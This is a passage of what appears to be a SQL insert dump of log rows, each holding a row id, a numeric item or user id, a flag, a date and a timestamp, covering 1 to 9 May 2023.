16:59:37'),(75107,1594,1,'2023-05-01','2023-05-01 17:06:03'),(75108,4412,1,'2023-05-01','2023-05-01 17:30:16'),(75109,4750,1,'2023-05-01','2023-05-01 17:32:39'),(75110,80,1,'2023-05-01','2023-05-01 17:32:48'),(75111,89,1,'2023-05-01','2023-05-01 17:33:44'),(75112,1584,1,'2023-05-01','2023-05-01 17:35:18'),(75113,89,1,'2023-05-01','2023-05-01 17:58:22'),(75114,80,1,'2023-05-01','2023-05-01 17:58:24'),(75115,4457,1,'2023-05-01','2023-05-01 18:00:27'),(75116,89,1,'2023-05-01','2023-05-01 18:01:46'),(75117,3691,1,'2023-05-01','2023-05-01 18:15:10'),(75118,91,1,'2023-05-01','2023-05-01 18:16:40'),(75119,87,1,'2023-05-01','2023-05-01 18:17:03'),(75120,91,1,'2023-05-01','2023-05-01 18:17:13'),(75121,3691,1,'2023-05-01','2023-05-01 19:07:55'),(75122,4436,1,'2023-05-01','2023-05-01 19:43:14'),(75123,68,1,'2023-05-01','2023-05-01 19:43:16'),(75124,4520,1,'2023-05-01','2023-05-01 19:43:47'),(75125,4747,1,'2023-05-01','2023-05-01 19:48:18'),(75126,5276,1,'2023-05-01','2023-05-01 20:06:18'),(75127,474,1,'2023-05-01','2023-05-01 20:15:49'),(75128,3691,1,'2023-05-01','2023-05-01 20:24:11'),(75129,4911,1,'2023-05-01','2023-05-01 22:12:10'),(75130,4391,1,'2023-05-01','2023-05-01 22:25:31'),(75131,4391,1,'2023-05-01','2023-05-01 23:19:28'),(75132,3781,1,'2023-05-01','2023-05-01 23:41:26'),(75133,1586,1,'2023-05-01','2023-05-01 23:49:57'),(75134,1596,1,'2023-05-02','2023-05-02 00:13:31'),(75135,4911,1,'2023-05-02','2023-05-02 01:08:47'),(75136,3030,1,'2023-05-02','2023-05-02 01:26:24'),(75137,1747,1,'2023-05-02','2023-05-02 01:42:09'),(75138,3664,1,'2023-05-02','2023-05-02 01:57:27'),(75139,4753,1,'2023-05-02','2023-05-02 01:57:54'),(75140,3083,1,'2023-05-02','2023-05-02 01:57:55'),(75141,468,1,'2023-05-02','2023-05-02 02:07:10'),(75142,76,1,'2023-05-02','2023-05-02 02:12:39'),(75143,4323,1,'2023-05-02','2023-05-02 02:16:55'),(75144,4963,1,'2023-05-02','2023-05-02 02:25:47'),(75145,89,1,'2023-05-02','2023-05-02 02:36:00'),(75146,1701,1,'2023-05-02','2023-05-02 02:45:04'),(75147,1608,1,'2023-05-02','2023-05-02 02:50:08'),(75148,470,1,'2023-05-02','2023-05-02 02:50:35'),(75149,4428,1,'2023-05-02','2023-05-02 02:50:37'),(75150,5037,1,'2023-05-02','2023-05-02 03:30:06'),(75151,1600,1,'2023-05-02','2023-05-02 03:36:25'),(75152,3691,1,'2023-05-02','2023-05-02 03:43:43'),(75153,483,1,'2023-05-02','2023-05-02 03:52:43'),(75154,5037,1,'2023-05-02','2023-05-02 03:58:01'),(75155,3691,1,'2023-05-02','2023-05-02 04:15:02'),(75156,4703,1,'2023-05-02','2023-05-02 04:20:06'),(75157,4412,1,'2023-05-02','2023-05-02 04:20:34'),(75158,474,1,'2023-05-02','2023-05-02 04:45:14'),(75159,4938,1,'2023-05-02','2023-05-02 05:13:57'),(75160,4382,1,'2023-05-02','2023-05-02 05:22:33'),(75161,570,1,'2023-05-02','2023-05-02 06:40:05'),(75162,3083,1,'2023-05-02','2023-05-02 07:52:13'),(75163,2911,1,'2023-05-02','2023-05-02 08:06:04'),(75164,1582,1,'2023-05-02','2023-05-02 08:44:34'),(75165,4966,1,'2023-05-02','2023-05-02 08:48:19'),(75166,3240,1,'2023-05-02','2023-05-02 09:06:15'),(75167,2993,1,'2023-05-02','2023-05-02 09:21:07'),(75168,5163,1,'2023-05-02','2023-05-02 09:29:33'),(75169,4520,1,'2023-05-02','2023-05-02 09:29:34'),(75170,3229,1,'2023-05-02','2023-05-02 09:41:31'),(75171,4753,1,'2023-05-02','2023-05-02 09:47:24'),(75172,2309,1,'2023-05-02','2023-05-02 10:41:02'),(75173,2813,1,'2023-05-02','2023-05-02 10:46:07'),(75174,68,1,'2023-05-02','2023-05-02 10:48:07'),(75175,91,1,'2023-05-02','2023-05-02 10:57:00'),(75176,4436,1,'2023-05-02','2023-05-02 10:57:27'),(75177,4930,1,'2023-05-02','2023-05-02 10:59:31'),(75178,3079,1,'2023-05-02','2023-05-02 11:19:50'),(75179,3090,1,'2023-05-02','2023-05-02 11:33:32'),(75180,3267,1,'2023-05-02','2023-05-02 11:34:04'),(75181,1582,1,'2023-05-02','2023-05-02 11:48:24'),(75182,487,1,'2023-05-02','2023-05-02 12:00:04'),(75183,1749,1,'2023-05-02','2023-05-02 12:07:29'),(75184,3278,1,'2023-05-02','2023-05-02 12:27:10'),(75185,1582,1,'2023-05-02','2023-05-02 12:38:09'),(75186,1722,1,'2023-05-02','2023-05-02 13:02:08'),(75187,4412,1,'2023-05-02','2023-05-02 13:11:43'),(75188,72,1,'2023-05-02','2023-05-02 13:30:07'),(75189,3482,1,'2023-05-02','2023-05-02 13:47:47'),(75190,474,1,'2023-05-02','2023-05-02 13:57:32'),(75191,4911,1,'2023-05-02','2023-05-02 13:59:40'),(75192,1588,1,'2023-05-02','2023-05-02 14:03:34'),(75193,4753,1,'2023-05-02','2023-05-02 14:05:13'),(75194,1582,1,'2023-05-02','2023-05-02 14:09:05'),(75195,4911,1,'2023-05-02','2023-05-02 14:13:19'),(75196,468,1,'2023-05-02','2023-05-02 14:21:07'),(75197,4980,1,'2023-05-02','2023-05-02 14:22:57'),(75198,1582,1,'2023-05-02','2023-05-02 14:26:57'),(75199,4988,1,'2023-05-02','2023-05-02 14:27:05'),(75200,2309,1,'2023-05-02','2023-05-02 14:39:57'),(75201,470,1,'2023-05-02','2023-05-02 14:40:20'),(75202,5264,1,'2023-05-02','2023-05-02 14:56:31'),(75203,4911,1,'2023-05-02','2023-05-02 15:10:07'),(75204,474,1,'2023-05-02','2023-05-02 15:11:51'),(75205,470,1,'2023-05-02','2023-05-02 15:29:26'),(75206,4963,1,'2023-05-02','2023-05-02 15:35:46'),(75207,80,1,'2023-05-02','2023-05-02 15:41:29'),(75208,487,1,'2023-05-02','2023-05-02 15:41:55'),(75209,4768,1,'2023-05-02','2023-05-02 15:50:33'),(75210,3752,1,'2023-05-02','2023-05-02 15:51:21'),(75211,4911,1,'2023-05-02','2023-05-02 15:56:19'),(75212,4911,1,'2023-05-02','2023-05-02 16:21:16'),(75213,4802,1,'2023-05-02','2023-05-02 16:25:19'),(75214,4747,1,'2023-05-02','2023-05-02 16:27:29'),(75215,4966,1,'2023-05-02','2023-05-02 17:25:25'),(75216,4966,1,'2023-05-02','2023-05-02 17:25:37'),(75217,1588,1,'2023-05-02','2023-05-02 17:27:18'),(75218,4938,1,'2023-05-02','2023-05-02 17:37:20'),(75219,4911,1,'2023-05-02','2023-05-02 17:37:34'),(75220,468,1,'2023-05-02','2023-05-02 17:46:22'),(75221,4911,1,'2023-05-02','2023-05-02 17:51:59'),(75222,76,1,'2023-05-02','2023-05-02 17:54:01'),(75223,4750,1,'2023-05-02','2023-05-02 19:03:29'),(75224,5037,1,'2023-05-02','2023-05-02 19:17:13'),(75225,76,1,'2023-05-02','2023-05-02 19:19:16'),(75226,3069,1,'2023-05-02','2023-05-02 19:24:57'),(75227,4938,1,'2023-05-02','2023-05-02 19:46:22'),(75228,473,1,'2023-05-02','2023-05-02 20:03:01'),(75229,4485,1,'2023-05-02','2023-05-02 20:10:40'),(75230,1596,1,'2023-05-02','2023-05-02 21:00:03'),(75231,89,1,'2023-05-02','2023-05-02 21:39:55'),(75232,1582,1,'2023-05-02','2023-05-02 22:19:51'),(75233,84,1,'2023-05-03','2023-05-03 01:17:24'),(75234,4802,1,'2023-05-03','2023-05-03 01:42:14'),(75235,89,1,'2023-05-03','2023-05-03 02:01:45'),(75236,3742,1,'2023-05-03','2023-05-03 02:47:22'),(75237,4332,1,'2023-05-03','2023-05-03 03:17:23'),(75238,468,1,'2023-05-03','2023-05-03 03:36:08'),(75239,1612,1,'2023-05-03','2023-05-03 04:10:45'),(75240,4747,1,'2023-05-03','2023-05-03 05:10:28'),(75241,4988,1,'2023-05-03','2023-05-03 06:31:37'),(75242,4768,1,'2023-05-03','2023-05-03 07:47:24'),(75243,2395,1,'2023-05-03','2023-05-03 08:53:32'),(75244,3090,1,'2023-05-03','2023-05-03 09:01:35'),(75245,4412,1,'2023-05-03','2023-05-03 09:24:54'),(75246,4966,1,'2023-05-03','2023-05-03 09:34:44'),(75247,1594,1,'2023-05-03','2023-05-03 09:54:51'),(75248,4332,1,'2023-05-03','2023-05-03 10:48:31'),(75249,68,1,'2023-05-03','2023-05-03 11:24:26'),(75250,4911,1,'2023-05-03','2023-05-03 11:24:59'),(75251,4911,1,'2023-05-03','2023-05-03 11:51:21'),(75252,4911,1,'2023-05-03','2023-05-03 11:51:30'),(75253,479,1,'2023-05-03','2023-05-03 12:14:15'),(75254,3069,1,'2023-05-03','2023-05-03 12:17:23'),(75255,3742,1,'2023-05-03','2023-05-03 12:34:38'),(75256,3004,1,'2023-05-03','2023-05-03 13:39:54'),(75257,4960,1,'2023-05-03','2023-05-03 13:47:39'),(75258,483,1,'2023-05-03','2023-05-03 14:40:28'),(75259,476,1,'2023-05-03','2023-05-03 14:59:05'),(75260,5062,1,'2023-05-03','2023-05-03 15:05:33'),(75261,1544,1,'2023-05-03','2023-05-03 15:31:06'),(75262,4436,1,'2023-05-03','2023-05-03 15:40:27'),(75263,1604,1,'2023-05-03','2023-05-03 15:45:46'),(75264,3706,1,'2023-05-03','2023-05-03 15:47:34'),(75265,1596,1,'2023-05-03','2023-05-03 16:38:50'),(75266,2956,1,'2023-05-03','2023-05-03 16:41:21'),(75267,4963,1,'2023-05-03','2023-05-03 17:15:26'),(75268,1544,1,'2023-05-03','2023-05-03 18:09:03'),(75269,3706,1,'2023-05-03','2023-05-03 18:09:55'),(75270,5119,1,'2023-05-03','2023-05-03 18:30:10'),(75271,5119,1,'2023-05-03','2023-05-03 19:17:40'),(75272,479,1,'2023-05-03','2023-05-03 19:41:09'),(75273,4911,1,'2023-05-03','2023-05-03 19:55:20'),(75274,4911,1,'2023-05-03','2023-05-03 20:01:18'),(75275,2395,1,'2023-05-03','2023-05-03 20:29:31'),(75276,2617,1,'2023-05-03','2023-05-03 20:38:06'),(75277,1596,1,'2023-05-03','2023-05-03 21:31:00'),(75278,5080,1,'2023-05-03','2023-05-03 21:32:42'),(75279,1596,1,'2023-05-03','2023-05-03 21:42:00'),(75280,1747,1,'2023-05-03','2023-05-03 22:42:27'),(75281,1726,1,'2023-05-03','2023-05-03 23:40:28'),(75282,1726,1,'2023-05-04','2023-05-04 00:16:29'),(75283,1728,1,'2023-05-04','2023-05-04 02:01:27'),(75284,1582,1,'2023-05-04','2023-05-04 02:11:44'),(75285,1582,1,'2023-05-04','2023-05-04 02:26:06'),(75286,4911,1,'2023-05-04','2023-05-04 03:09:29'),(75287,1602,1,'2023-05-04','2023-05-04 03:53:37'),(75288,2457,1,'2023-05-04','2023-05-04 03:53:39'),(75289,2154,1,'2023-05-04','2023-05-04 04:05:20'),(75290,3090,1,'2023-05-04','2023-05-04 04:18:25'),(75291,3771,1,'2023-05-04','2023-05-04 04:34:08'),(75292,4657,1,'2023-05-04','2023-05-04 05:09:50'),(75293,2809,1,'2023-05-04','2023-05-04 05:23:35'),(75294,91,1,'2023-05-04','2023-05-04 05:46:02'),(75295,1602,1,'2023-05-04','2023-05-04 08:23:04'),(75296,2503,1,'2023-05-04','2023-05-04 09:02:07'),(75297,1600,1,'2023-05-04','2023-05-04 09:38:37'),(75298,4556,1,'2023-05-04','2023-05-04 09:51:01'),(75299,1614,1,'2023-05-04','2023-05-04 09:57:53'),(75300,474,1,'2023-05-04','2023-05-04 09:59:15'),(75301,68,1,'2023-05-04','2023-05-04 10:00:52'),(75302,5317,1,'2023-05-04','2023-05-04 10:03:06'),(75303,1600,1,'2023-05-04','2023-05-04 10:03:36'),(75304,68,1,'2023-05-04','2023-05-04 10:13:18'),(75305,1600,1,'2023-05-04','2023-05-04 10:21:31'),(75306,3083,1,'2023-05-04','2023-05-04 10:26:37'),(75307,4520,1,'2023-05-04','2023-05-04 10:35:34'),(75308,3030,1,'2023-05-04','2023-05-04 10:43:18'),(75309,1768,1,'2023-05-04','2023-05-04 11:01:01'),(75310,1600,1,'2023-05-04','2023-05-04 11:07:01'),(75311,570,1,'2023-05-04','2023-05-04 11:13:16'),(75312,3090,1,'2023-05-04','2023-05-04 11:43:08'),(75313,1768,1,'2023-05-04','2023-05-04 11:51:59'),(75314,4776,1,'2023-05-04','2023-05-04 11:52:17'),(75315,4332,1,'2023-05-04','2023-05-04 12:05:40'),(75316,4275,1,'2023-05-04','2023-05-04 12:36:57'),(75317,1582,1,'2023-05-04','2023-05-04 12:59:22'),(75318,80,1,'2023-05-04','2023-05-04 13:26:35'),(75319,72,1,'2023-05-04','2023-05-04 13:35:36'),(75320,479,1,'2023-05-04','2023-05-04 13:41:40'),(75321,80,1,'2023-05-04','2023-05-04 13:48:03'),(75322,76,1,'2023-05-04','2023-05-04 13:57:43'),(75323,479,1,'2023-05-04','2023-05-04 14:11:42'),(75324,1582,1,'2023-05-04','2023-05-04 14:21:53'),(75325,3090,1,'2023-05-04','2023-05-04 14:41:40'),(75326,4944,1,'2023-05-04','2023-05-04 15:01:24'),(75327,4980,1,'2023-05-04','2023-05-04 15:35:22'),(75328,1614,1,'2023-05-04','2023-05-04 16:06:10'),(75329,1614,1,'2023-05-04','2023-05-04 16:14:33'),(75330,5271,1,'2023-05-04','2023-05-04 16:17:48'),(75331,1870,1,'2023-05-04','2023-05-04 17:02:41'),(75332,4576,1,'2023-05-04','2023-05-04 17:20:30'),(75333,4768,1,'2023-05-04','2023-05-04 18:27:57'),(75334,470,1,'2023-05-04','2023-05-04 18:28:07'),(75335,5271,1,'2023-05-04','2023-05-04 18:33:16'),(75336,470,1,'2023-05-04','2023-05-04 18:52:03'),(75337,4756,1,'2023-05-04','2023-05-04 19:37:11'),(75338,1602,1,'2023-05-04','2023-05-04 20:16:51'),(75339,3664,1,'2023-05-04','2023-05-04 20:26:57'),(75340,5076,1,'2023-05-04','2023-05-04 20:51:02'),(75341,4485,1,'2023-05-04','2023-05-04 22:05:27'),(75342,1772,1,'2023-05-04','2023-05-04 22:17:19'),(75343,3771,1,'2023-05-05','2023-05-05 00:02:48'),(75344,4960,1,'2023-05-05','2023-05-05 00:29:05'),(75345,4960,1,'2023-05-05','2023-05-05 00:29:38'),(75346,1739,1,'2023-05-05','2023-05-05 00:37:34'),(75347,3316,1,'2023-05-05','2023-05-05 00:45:57'),(75348,4911,1,'2023-05-05','2023-05-05 01:15:20'),(75349,472,1,'2023-05-05','2023-05-05 01:49:46'),(75350,3721,1,'2023-05-05','2023-05-05 02:15:00'),(75351,472,1,'2023-05-05','2023-05-05 02:40:40'),(75352,1718,1,'2023-05-05','2023-05-05 03:52:10'),(75353,3316,1,'2023-05-05','2023-05-05 04:18:09'),(75354,5253,1,'2023-05-05','2023-05-05 05:47:14'),(75355,1586,1,'2023-05-05','2023-05-05 06:51:57'),(75356,1586,1,'2023-05-05','2023-05-05 06:53:01'),(75357,1711,1,'2023-05-05','2023-05-05 08:03:54'),(75358,4448,1,'2023-05-05','2023-05-05 08:12:25'),(75359,3781,1,'2023-05-05','2023-05-05 10:19:38'),(75360,4911,1,'2023-05-05','2023-05-05 10:54:30'),(75361,1588,1,'2023-05-05','2023-05-05 11:04:18'),(75362,4542,1,'2023-05-05','2023-05-05 11:19:19'),(75363,1598,1,'2023-05-05','2023-05-05 11:35:16'),(75364,5163,1,'2023-05-05','2023-05-05 11:44:07'),(75365,5163,1,'2023-05-05','2023-05-05 11:45:07'),(75366,91,1,'2023-05-05','2023-05-05 11:45:27'),(75367,3664,1,'2023-05-05','2023-05-05 11:49:13'),(75368,91,1,'2023-05-05','2023-05-05 12:10:24'),(75369,68,1,'2023-05-05','2023-05-05 12:14:32'),(75370,4420,1,'2023-05-05','2023-05-05 12:17:37'),(75371,3781,1,'2023-05-05','2023-05-05 12:19:25'),(75372,1877,1,'2023-05-05','2023-05-05 12:26:14'),(75373,1870,1,'2023-05-05','2023-05-05 12:33:09'),(75374,91,1,'2023-05-05','2023-05-05 12:40:03'),(75375,4444,1,'2023-05-05','2023-05-05 12:43:51'),(75376,1612,1,'2023-05-05','2023-05-05 13:12:02'),(75377,4432,1,'2023-05-05','2023-05-05 13:18:14'),(75378,3030,1,'2023-05-05','2023-05-05 13:28:42'),(75379,1711,1,'2023-05-05','2023-05-05 13:55:27'),(75380,3006,1,'2023-05-05','2023-05-05 13:56:45'),(75381,3226,1,'2023-05-05','2023-05-05 14:04:08'),(75382,3226,1,'2023-05-05','2023-05-05 14:09:46'),(75383,5071,1,'2023-05-05','2023-05-05 14:11:31'),(75384,3060,1,'2023-05-05','2023-05-05 14:18:36'),(75385,3226,1,'2023-05-05','2023-05-05 14:52:36'),(75386,470,1,'2023-05-05','2023-05-05 14:55:28'),(75387,470,1,'2023-05-05','2023-05-05 15:15:05'),(75388,3486,1,'2023-05-05','2023-05-05 15:37:35'),(75389,5304,1,'2023-05-05','2023-05-05 15:46:07'),(75390,4744,1,'2023-05-05','2023-05-05 16:31:41'),(75391,4771,1,'2023-05-05','2023-05-05 16:49:35'),(75392,4556,1,'2023-05-05','2023-05-05 17:46:57'),(75393,5116,1,'2023-05-05','2023-05-05 17:55:30'),(75394,4542,1,'2023-05-05','2023-05-05 18:11:28'),(75395,1612,1,'2023-05-05','2023-05-05 18:16:32'),(75396,1612,1,'2023-05-05','2023-05-05 18:18:09'),(75397,4654,1,'2023-05-05','2023-05-05 18:24:12'),(75398,4765,1,'2023-05-05','2023-05-05 18:38:40'),(75399,108,1,'2023-05-05','2023-05-05 20:19:59'),(75400,4412,1,'2023-05-05','2023-05-05 22:03:19'),(75401,4960,1,'2023-05-05','2023-05-05 23:27:28'),(75402,3278,1,'2023-05-06','2023-05-06 01:39:40'),(75403,1745,1,'2023-05-06','2023-05-06 02:32:37'),(75404,2904,1,'2023-05-06','2023-05-06 04:50:15'),(75405,5280,1,'2023-05-06','2023-05-06 07:46:49'),(75406,470,1,'2023-05-06','2023-05-06 08:09:01'),(75407,3764,1,'2023-05-06','2023-05-06 08:12:09'),(75408,68,1,'2023-05-06','2023-05-06 08:36:25'),(75409,4911,1,'2023-05-06','2023-05-06 09:17:32'),(75410,4911,1,'2023-05-06','2023-05-06 09:18:28'),(75411,4412,1,'2023-05-06','2023-05-06 09:48:01'),(75412,4412,1,'2023-05-06','2023-05-06 09:51:44'),(75413,470,1,'2023-05-06','2023-05-06 09:54:38'),(75414,4520,1,'2023-05-06','2023-05-06 11:00:18'),(75415,4301,1,'2023-05-06','2023-05-06 11:08:55'),(75416,5280,1,'2023-05-06','2023-05-06 11:34:24'),(75417,4709,1,'2023-05-06','2023-05-06 11:42:13'),(75418,1612,1,'2023-05-06','2023-05-06 12:11:14'),(75419,1594,1,'2023-05-06','2023-05-06 12:45:52'),(75420,4893,1,'2023-05-06','2023-05-06 13:53:58'),(75421,1594,1,'2023-05-06','2023-05-06 14:16:29'),(75422,1612,1,'2023-05-06','2023-05-06 14:27:44'),(75423,4709,1,'2023-05-06','2023-05-06 14:38:57'),(75424,2904,1,'2023-05-06','2023-05-06 15:16:18'),(75425,4556,1,'2023-05-06','2023-05-06 15:30:23'),(75426,1602,1,'2023-05-06','2023-05-06 16:24:16'),(75427,1606,1,'2023-05-06','2023-05-06 17:13:48'),(75428,1612,1,'2023-05-06','2023-05-06 17:48:15'),(75429,4893,1,'2023-05-06','2023-05-06 17:57:23'),(75430,2609,1,'2023-05-06','2023-05-06 18:22:39'),(75431,2609,1,'2023-05-06','2023-05-06 18:39:18'),(75432,3664,1,'2023-05-06','2023-05-06 18:51:32'),(75433,3498,1,'2023-05-06','2023-05-06 18:55:50'),(75434,2609,1,'2023-05-06','2023-05-06 18:56:23'),(75435,1870,1,'2023-05-06','2023-05-06 19:17:47'),(75436,478,1,'2023-05-06','2023-05-06 19:39:58'),(75437,3313,1,'2023-05-06','2023-05-06 20:29:39'),(75438,4363,1,'2023-05-06','2023-05-06 20:32:28'),(75439,5253,1,'2023-05-06','2023-05-06 21:09:57'),(75440,3030,1,'2023-05-06','2023-05-06 21:17:22'),(75441,4960,1,'2023-05-06','2023-05-06 21:52:33'),(75442,4485,1,'2023-05-06','2023-05-06 22:21:32'),(75443,2165,1,'2023-05-06','2023-05-06 23:13:51'),(75444,4776,1,'2023-05-06','2023-05-06 23:17:49'),(75445,4485,1,'2023-05-06','2023-05-06 23:51:38'),(75446,1722,1,'2023-05-07','2023-05-07 00:12:34'),(75447,4457,1,'2023-05-07','2023-05-07 00:14:42'),(75448,1586,1,'2023-05-07','2023-05-07 01:28:08'),(75449,4420,1,'2023-05-07','2023-05-07 01:58:37'),(75450,1586,1,'2023-05-07','2023-05-07 02:10:49'),(75451,4637,1,'2023-05-07','2023-05-07 02:45:35'),(75452,4642,1,'2023-05-07','2023-05-07 03:00:06'),(75453,3479,1,'2023-05-07','2023-05-07 03:21:06'),(75454,108,1,'2023-05-07','2023-05-07 03:49:02'),(75455,3724,1,'2023-05-07','2023-05-07 04:04:27'),(75456,4960,1,'2023-05-07','2023-05-07 04:18:31'),(75457,89,1,'2023-05-07','2023-05-07 04:27:02'),(75458,4960,1,'2023-05-07','2023-05-07 04:33:32'),(75459,2165,1,'2023-05-07','2023-05-07 05:11:58'),(75460,5076,1,'2023-05-07','2023-05-07 05:56:33'),(75461,3724,1,'2023-05-07','2023-05-07 06:04:31'),(75462,2904,1,'2023-05-07','2023-05-07 06:24:38'),(75463,570,1,'2023-05-07','2023-05-07 06:53:44'),(75464,5334,1,'2023-05-07','2023-05-07 07:14:03'),(75465,4301,1,'2023-05-07','2023-05-07 07:43:22'),(75466,3479,1,'2023-05-07','2023-05-07 07:51:20'),(75467,4420,1,'2023-05-07','2023-05-07 08:36:17'),(75468,4642,1,'2023-05-07','2023-05-07 09:04:12'),(75469,3486,1,'2023-05-07','2023-05-07 09:28:58'),(75470,3498,1,'2023-05-07','2023-05-07 10:02:50'),(75471,3742,1,'2023-05-07','2023-05-07 10:02:51'),(75472,3482,1,'2023-05-07','2023-05-07 10:02:52'),(75473,5271,1,'2023-05-07','2023-05-07 10:02:53'),(75474,4966,1,'2023-05-07','2023-05-07 10:21:22'),(75475,4657,1,'2023-05-07','2023-05-07 10:58:38'),(75476,2159,1,'2023-05-07','2023-05-07 11:02:51'),(75477,80,1,'2023-05-07','2023-05-07 11:29:51'),(75478,89,1,'2023-05-07','2023-05-07 11:31:26'),(75479,89,1,'2023-05-07','2023-05-07 11:31:41'),(75480,76,1,'2023-05-07','2023-05-07 11:31:48'),(75481,2751,1,'2023-05-07','2023-05-07 12:03:00'),(75482,4768,1,'2023-05-07','2023-05-07 12:07:38'),(75483,4657,1,'2023-05-07','2023-05-07 12:08:01'),(75484,5163,1,'2023-05-07','2023-05-07 12:16:42'),(75485,1780,1,'2023-05-07','2023-05-07 14:24:01'),(75486,4944,1,'2023-05-07','2023-05-07 16:46:49'),(75487,2751,1,'2023-05-07','2023-05-07 17:06:17'),(75488,3102,1,'2023-05-07','2023-05-07 17:33:34'),(75489,4420,1,'2023-05-07','2023-05-07 19:13:41'),(75490,4938,1,'2023-05-07','2023-05-07 19:31:25'),(75491,4420,1,'2023-05-07','2023-05-07 19:52:44'),(75492,1780,1,'2023-05-07','2023-05-07 22:11:12'),(75493,4960,1,'2023-05-07','2023-05-07 22:23:14'),(75494,2989,1,'2023-05-07','2023-05-07 23:07:26'),(75495,477,1,'2023-05-07','2023-05-07 23:42:40'),(75496,1588,1,'2023-05-08','2023-05-08 03:18:21'),(75497,80,1,'2023-05-08','2023-05-08 03:18:29'),(75498,1588,1,'2023-05-08','2023-05-08 03:18:40'),(75499,4950,1,'2023-05-08','2023-05-08 03:22:34'),(75500,1596,1,'2023-05-08','2023-05-08 03:33:41'),(75501,4950,1,'2023-05-08','2023-05-08 04:47:34'),(75502,1598,1,'2023-05-08','2023-05-08 05:15:53'),(75503,4520,1,'2023-05-08','2023-05-08 05:41:35'),(75504,4608,1,'2023-05-08','2023-05-08 06:33:36'),(75505,1586,1,'2023-05-08','2023-05-08 08:25:15'),(75506,1586,1,'2023-05-08','2023-05-08 08:27:38'),(75507,1600,1,'2023-05-08','2023-05-08 08:44:40'),(75508,5020,1,'2023-05-08','2023-05-08 08:45:42'),(75509,3090,1,'2023-05-08','2023-05-08 08:50:46'),(75510,80,1,'2023-05-08','2023-05-08 09:31:05'),(75511,4944,1,'2023-05-08','2023-05-08 09:33:36'),(75512,4776,1,'2023-05-08','2023-05-08 10:01:37'),(75513,5153,1,'2023-05-08','2023-05-08 10:14:41'),(75514,4960,1,'2023-05-08','2023-05-08 10:29:40'),(75515,1612,1,'2023-05-08','2023-05-08 10:34:52'),(75516,1586,1,'2023-05-08','2023-05-08 11:00:06'),(75517,1745,1,'2023-05-08','2023-05-08 11:06:24'),(75518,4485,1,'2023-05-08','2023-05-08 11:26:58'),(75519,5122,1,'2023-05-08','2023-05-08 11:41:42'),(75520,4938,1,'2023-05-08','2023-05-08 11:58:48'),(75521,1596,1,'2023-05-08','2023-05-08 11:59:44'),(75522,4753,1,'2023-05-08','2023-05-08 12:01:18'),(75523,3090,1,'2023-05-08','2023-05-08 12:44:41'),(75524,1711,1,'2023-05-08','2023-05-08 12:45:56'),(75525,3290,1,'2023-05-08','2023-05-08 12:49:50'),(75526,3290,1,'2023-05-08','2023-05-08 12:52:06'),(75527,4866,1,'2023-05-08','2023-05-08 13:28:51'),(75528,4520,1,'2023-05-08','2023-05-08 13:29:40'),(75529,2904,1,'2023-05-08','2023-05-08 13:57:36'),(75530,470,1,'2023-05-08','2023-05-08 14:07:44'),(75531,4765,1,'2023-05-08','2023-05-08 14:15:13'),(75532,470,1,'2023-05-08','2023-05-08 14:26:49'),(75533,1588,1,'2023-05-08','2023-05-08 14:34:52'),(75534,3290,1,'2023-05-08','2023-05-08 14:41:50'),(75535,2148,1,'2023-05-08','2023-05-08 14:42:00'),(75536,3287,1,'2023-05-08','2023-05-08 15:11:53'),(75537,4444,1,'2023-05-08','2023-05-08 15:36:42'),(75538,5122,1,'2023-05-08','2023-05-08 15:41:41'),(75539,4618,1,'2023-05-08','2023-05-08 15:41:49'),(75540,3287,1,'2023-05-08','2023-05-08 15:41:51'),(75541,1544,1,'2023-05-08','2023-05-08 15:55:40'),(75542,4756,1,'2023-05-08','2023-05-08 15:59:11'),(75543,5163,1,'2023-05-08','2023-05-08 16:04:05'),(75544,80,1,'2023-05-08','2023-05-08 16:04:20'),(75545,5163,1,'2023-05-08','2023-05-08 16:04:23'),(75546,89,1,'2023-05-08','2023-05-08 16:04:42'),(75547,89,1,'2023-05-08','2023-05-08 16:05:09'),(75548,1728,1,'2023-05-08','2023-05-08 16:05:29'),(75549,89,1,'2023-05-08','2023-05-08 16:05:39'),(75550,5163,1,'2023-05-08','2023-05-08 16:07:16'),(75551,2148,1,'2023-05-08','2023-05-08 16:08:20'),(75552,1598,1,'2023-05-08','2023-05-08 16:16:40'),(75553,1594,1,'2023-05-08','2023-05-08 16:34:03'),(75554,5076,1,'2023-05-08','2023-05-08 17:10:41'),(75555,1602,1,'2023-05-08','2023-05-08 17:32:20'),(75556,5024,1,'2023-05-08','2023-05-08 18:09:03'),(75557,3489,1,'2023-05-08','2023-05-08 18:39:22'),(75558,2159,1,'2023-05-08','2023-05-08 19:27:34'),(75559,1596,1,'2023-05-08','2023-05-08 20:10:54'),(75560,3691,1,'2023-05-08','2023-05-08 20:31:33'),(75561,89,1,'2023-05-08','2023-05-08 21:24:26'),(75562,570,1,'2023-05-08','2023-05-08 22:20:14'),(75563,5289,1,'2023-05-08','2023-05-08 22:50:48'),(75564,4963,1,'2023-05-09','2023-05-09 03:49:25'),(75565,1596,1,'2023-05-09','2023-05-09 04:01:55'),(75566,4412,1,'2023-05-09','2023-05-09 05:59:12'),(75567,4756,1,'2023-05-09','2023-05-09 06:55:35'),(75568,5334,1,'2023-05-09','2023-05-09 07:26:37'),(75569,4911,1,'2023-05-09','2023-05-09 08:34:05'),(75570,4582,1,'2023-05-09','2023-05-09 08:36:49'),(75571,4744,1,'2023-05-09','2023-05-09 08:47:39'),(75572,470,1,'2023-05-09','2023-05-09 08:48:53'),(75573,4911,1,'2023-05-09','2023-05-09 08:55:39'),(75574,1614,1,'2023-05-09','2023-05-09 08:59:23'),(75575,4911,1,'2023-05-09','2023-05-09 09:00:27'),(75576,1588,1,'2023-05-09','2023-05-09 09:02:26'),(75577,4741,1,'2023-05-09','2023-05-09 09:25:51'),(75578,5317,1,'2023-05-09','2023-05-09 09:54:50'),(75579,4765,1,'2023-05-09','2023-05-09 10:02:58'),(75580,4762,1,'2023-05-09','2023-05-09 10:37:36'),(75581,4911,1,'2023-05-09','2023-05-09 10:46:40'),(75582,91,1,'2023-05-09','2023-05-09 11:25:02'),(75583,5071,1,'2023-05-09','2023-05-09 11:30:29'),(75584,5323,1,'2023-05-09','2023-05-09 12:21:43'),(75585,5280,1,'2023-05-09','2023-05-09 12:31:56'),(75586,2297,1,'2023-05-09','2023-05-09 12:54:50'),(75587,4622,1,'2023-05-09','2023-05-09 12:56:53'),(75588,2293,1,'2023-05-09','2023-05-09 13:27:12'),(75589,1600,1,'2023-05-09','2023-05-09 13:34:24'),(75590,5323,1,'2023-05-09','2023-05-09 13:48:03'),(75591,1588,1,'2023-05-09','2023-05-09 14:06:19'),(75592,4966,1,'2023-05-09','2023-05-09 